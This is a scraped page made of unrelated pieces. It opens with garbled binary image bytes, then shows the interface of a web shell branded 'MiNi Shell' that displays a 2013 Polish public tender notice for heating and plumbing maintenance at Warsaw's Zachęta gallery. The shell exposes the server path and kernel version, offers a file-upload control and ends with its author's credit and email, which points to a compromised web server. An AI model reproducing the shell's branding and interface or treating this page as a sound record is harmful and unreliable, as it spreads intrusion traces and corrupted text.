JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/21906-N-2013.html

<p class="kh_header"><b>Warszawa: usługi konserwacyjne :
- węzła cieplnego
- wewnętrznej instalacji centralnego ogrzewania
-wewnętrznej instalacji wody ciepłej z cyrkulacją
- instalacji wewnętrznej zimnej wody oraz kanalizacji wewnętrznej
-wewnętrznej instalacji ciepła technologicznego
oraz usuwanie awarii
w budynku Galerii Zachęta w Warszawie przy pl. Małachowskiego 3</b><br>
<b>Numer ogłoszenia: 21906 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachęta Narodowa Galeria Sztuki , Plac Małachowskiego 3, 00-916 Warszawa, woj. mazowieckie, tel. 22 556 96 01, faks 22 8277886.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zacheta.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi konserwacyjne :
- węzła cieplnego
- wewnętrznej instalacji centralnego ogrzewania
-wewnętrznej instalacji wody ciepłej z cyrkulacją
- instalacji wewnętrznej zimnej wody oraz kanalizacji wewnętrznej
-wewnętrznej instalacji ciepła technologicznego
oraz usuwanie awarii
w budynku Galerii Zachęta w Warszawie przy pl. Małachowskiego 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są  usługi konserwacyjne oraz usuwanie awarii w zakresie:
- węzła cieplnego
- wewnętrznej instalacji centralnego ogrzewania
-wewnętrznej instalacji wody ciepłej z cyrkulacją
- instalacji wewnętrznej zimnej wody oraz kanalizacji wewnętrznej
-wewnętrznej instalacji ciepła technologicznego
2. Miejscem wykonywania usług będzie siedziba Zachęta Narodowa Galeria Sztuki w Warszawie plac Małachowskiego 3

3. Do zadań wykonawcy będą należeć wszelkie prace mające na celu utrzymanie w stałej sprawności wszystkich instalacji i urządzeń, zakup i utrzymanie niezbędnego, minimalnego zapasu materiałów eksploatacyjnych i materiałów potrzebnych do usuwania usterek i wykonywania zakresu prac podstawowych:
1)	do materiałów eksploatacyjnych zalicza się materiały niezbędne do prowadzenia bieżącej konserwacji, które zapewnia Wykonawca w ramach wynagrodzenia ryczałtowego, 
2)	zapas materiałów potrzebnych do usuwania usterek oraz wykonania zakresu prac podstawowych utrzymuje Wykonawca. 

4. Wykonawca zapewni w budynku galerii Zachęta obecność konserwatora z uprawnieniami przewidzianymi przepisami prawa od poniedziałku do piątku przez cztery godzinny dziennie, w godzinach ustalonych wspólnie przez obie strony. 

5. Wykonawca zobowiązany będzie do odbycia raz w miesiącu (ostatniego dnia każdego miesiąca)  spotkania z przedstawicielem Zamawiającego i ewentualnie z konserwatorami instalacji elektrycznej i automatyki podsumowującego efekty prac w zakresie objętym umową, wspólnego sporządzenia miesięcznego protokołu podsumowującego wykonane prace. 

6. Wykonawca zobowiązany jest do utrzymywania ( w tym podania do wiadomości Zamawiającego) czynnych całą dobę, we wszystkie dni tygodnia nw. kanałów łączności:
	a) telefonu stacjonarnego
	b) telefonu komórkowego
	c) fax
	d) adresu e-mail.
e) a ponadto do reagowania na zgłoszenie o awarii w terminie do 2 godzin, rozumianego jako przybycie do siedziby Zamawiającego

7.	Wykonawca niezwłoczne poinformuje Zamawiającego o nieprawidłowościach 
i awariach w działaniu urządzeń i systemów objętych zakresem konserwacji
8. Czynności, konserwacyjne, naprawcze mają zapewnić bezawaryjną eksploatację oraz uzyskanie optymalnych warunków pracy urządzeń i instalacji, jak również spełnienie wszelkich wymogów  obowiązujących w poszczególnych branżach oraz zaleceń producentów urządzeń i warunków gwarancji. Celem czynności konserwacyjnych jest utrzymanie urządzeń w stanie niepogorszonym,                   z uwzględnieniem zjawiska normalnego zużycia i naturalnych procesów starzenia.
9. Przez bieżącą konserwację rozumiane jest wykonanie wszystkich okresowych czynności konserwacyjnych, przewidzianych w dokumentacji techniczno ruchowej producenta urządzeń, instalacji i systemów oraz w jego zaleceniach i wytycznych, a także warunkach gwarancji, dokumentacji projektowej, określonych przepisami obowiązującego prawa oraz wytycznymi branżowymi, jak również zasadami dobrej praktyki eksploatacyjnej. Przez pojęcie naprawy rozumiane jest usunięcie awarii urządzenia oraz przyczyny jej wystąpienia wraz z wszelkimi skutkami tejże awarii zaistniałymi w obrębie konserwowanej instalacji bądź urządzenia. 
Zakres rzeczowo - finansowy awarii będzie każdorazowo określany w protokole spisanym przez strony, a sposób realizacji i koszty muszą być uzgodnione i zatwierdzone przez zamawiającego
10.Wykonawca zobowiązuje się wykonać czynności konserwacyjne i stosować materiały konserwacyjno - eksploatacyjne zgodnie z wytycznymi producenta urządzeń zawartych w Dokumentacji Techniczno - Ruchowej, instrukcji serwisowej urządzeń (dostępnych do wglądu u Zamawiającego) oraz przestrzegać przepisów BHP i ppoż. 

11. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku Nr 1 (specyfikacja techniczna) oraz załącznikach 1A , 1B, 1C, 1D, 1E do SIWZ:
Załączniki:
1A : Zakres usług konserwacyjnych węzła cieplnego
1B: Zakres usług konserwacyjnych instalacji wewnętrznej centralnego ogrzewania
1C: Zakres usług konserwacyjnych instalacji wewnętrznej ciepłej wody z cyrkulacją
1D: Zakres usług konserwacyjnych instalacji wewnętrznej zimnej wody oraz kanalizacji wewnętrznej
1E: Zakres usług konserwacyjnych instalacji wewnętrznej ciepła technologicznego 

Wielkość zamówienia powyżej 14 000 i poniżej 200 000 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.72.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi, że wykonał lub wykonuje należycie w ciągu ostatnich trzech lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia (trwające co najmniej 12 m-cy) o podobnym zakresie jak przedmiot zamówienia i wartości na kwotę co najmniej 20 000,- zł brutto każde. Za podobne zamówienia zamawiający uzna wykonanie lub wykonywanie zamówienia (w ramach jednej umowy) którego przedmiotem jest usługa: 
- konserwacji - węzła cieplnego
- wewnętrznej instalacji centralnego ogrzewania
-wewnętrznej instalacji wody ciepłej z cyrkulacją
- instalacji wewnętrznej zimnej wody oraz kanalizacji wewnętrznej
-wewnętrznej instalacji ciepła technologicznego


Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę oświadczenia zgodnie z brzmieniem art. 22 ust. 1pkt. 2 ustawy - Pzp. - wg załącznika nr 3a do SIWZ oraz na podstawie wykazu zamówień potwierdzonych dokumentami stwierdzającymi należyte ich wykonanie Wykaz zamówień należy przedstawić  wg wzoru określonego w załączniku nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie złożonego przez Wykonawcę oświadczenia zgodnie z brzmieniem art. 22 ust. 1pkt. 3 ustawy - Pzp. - wg załącznika nr 3a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował  osobami zdolnymi do wykonania zamówienia - w celu wykazania powyższego należy przedstawić wykaz osób wg załącznika Nr 6 do SIWZ. Wykaz powinien obejmować osoby, które będą zajmować się eksploatacją i konserwacją urządzeń oraz kierownika budowy i kierowników robót branżowych(budowlanych i elektrycznych):
3)1.	Pracownicy, prowadzący eksploatacje i konserwacje urządzeń i instalacji wewnętrznych, muszą posiadać kwalifikacje spełniające wymogi Rozporządzenia Minister Gospodarki , Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 roku. Świadectwo kwalifikacyjne (załącznik do w/w Rozporządzenia). Wykonawca zobowiązuje się na wezwanie Zamawiającego do przedstawienia Świadectw Kwalifikacyjnych pracowników w okresie trwania umowy  
3)2.	Kierownik budowy (1 osoba) posiadający min. trzy letnie doświadczenie w pełnieniu funkcji  kierownika budowy, posiadający uprawnienia budowlane do  kierowania i nadzorowania w specjalności instalacyjnej w zakresie sieci , instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych. Osoba obejmująca funkcję kierowniczą musi wykazać się aktualnym wpisem do właściwej izby samorządu zawodowego,
3)3.	Kierownicy robót branżowych (budowlanych i elektrycznych), posiadający min. trzy letnie doświadczenie w pełnieniu funkcji kierowniczych , odpowiednie uprawnienia budowlane oraz aktualny wpis do właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie złożonego przez Wykonawcę oświadczenia zgodnie z brzmieniem art. 22 ust. 1pkt. 4 ustawy - Pzp. - wg załącznika nr 3a do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypis z ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeśli przedsiębiorca prowadzi działalność na jego podstawie), w celu weryfikacji reprezentacji podmiotu i podpisu złożonego na ofercie.
2)	Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wypisu z Krajowego Rejestru Sądowego lub zaświadczenia o prowadzeniu działalności gospodarczej - w formie oryginału lub kopii poświadczonej notarialnie.
3)	Pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia. 
4)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów są poświadczane za zgodność z oryginałem przez Wykonawcę, którego one dotyczą lub przez upoważnionego przez Wykonawców pełnomocnika.
5)	Wypełniony formularz ofertowy - załącznik nr 2 do SIWZ.
6)     Zobowiązanie podmiotu trzeciego do oddania Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - dotyczy sytuacji, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie ze wzorem umowy.
1.	Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w zakresie:
a.	zmiany podwykonawcy, w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców, 
b.	zmiany stawki podatku VAT w przypadku zmiany przepisów ustawy o podatku od towarów i usług .W przypadku zmiany stawki VAT wynagrodzenie Wykonawcy zostanie automatycznie zmienione bez konieczności zmiany umowy.
c.	W trakcie realizacji Umowy dopuszcza się zmiany podstawowego personelu pod warunkiem, że odnośne kwalifikacje i zdolności proponowanego personelu, będą takie same lub wyższe niż personelu wymienionego przez Wykonawcę w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zacheta.art.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachęta Narodowa Galeria Sztuki w Warszawie (00-916), pl. Małachowskiego 3 - wersja pisemna na wniosek wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2013 godzina 10:00, miejsce: siedziba Zamawiającego, w Warszawie, pl. Małachowskiego 3, kancelaria   (wysoki parter ), wejście z tyłu gmachu od ul. Burschego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com